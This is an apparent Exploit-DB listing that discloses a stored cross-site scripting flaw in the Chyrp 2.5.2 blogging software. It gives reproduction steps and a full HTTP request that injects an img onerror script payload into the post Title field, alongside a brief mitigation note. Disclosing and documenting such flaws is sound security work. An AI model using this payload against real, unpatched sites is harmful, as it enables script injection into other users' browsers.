Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)

vendor:

Chyrp

by:

Ahmet Ümit BAYRAM

6.1

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Chyrp

Affected Version From: 2.5.2002

Affected Version To: 2.5.2002

Patch Exists: NO

Related CWE:

CPE: a:chyrp:chyrp:2.5.2

Metasploit:

Other Scripts:

Platforms Tested: MacOS

2024

Chyrp 2.5.2 – Stored Cross-Site Scripting (XSS)

Chyrp 2.5.2 is vulnerable to stored cross-site scripting (XSS) due to improper sanitization of user-supplied data. An attacker can inject malicious scripts into the 'Title' field, leading to the execution of arbitrary code in the context of the user's browser. This vulnerability has been assigned CVE-ID: N/A.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user inputs before processing or storing them in the application. Regular security audits and code reviews can also help in identifying and fixing such security flaws.

Source

Exploit-DB raw data:

# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/chyrp/
# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
# Version: 2.5.2
# Tested on: MacOS

### Steps to Reproduce ###

- Login from the address: http://localhost/chyrp/?action=login.
- Click on 'Write'.
- Type this payload into the 'Title' field: "><img src=x onerror=alert(
"Stored")>
- Fill in the 'Body' area and click 'Publish'.
- An alert message saying "Stored" will appear in front of you.

### PoC Request ###

POST /chyrp/admin/?action=add_post HTTP/1.1
Host: localhost
Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11;
show_more_options=true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------28307567523233313132815561598
Content-Length: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="title"

"><img src=x onerror=alert("Stored")>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="body"

<p>1337</p>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="status"

public
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="slug"


-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="created_at"

04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="original_time"

04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="trackbacks"


-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="feather"

text
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="hash"

11e11aba15114f918ec1c2e6b8f8ddcf
-----------------------------28307567523233313132815561598--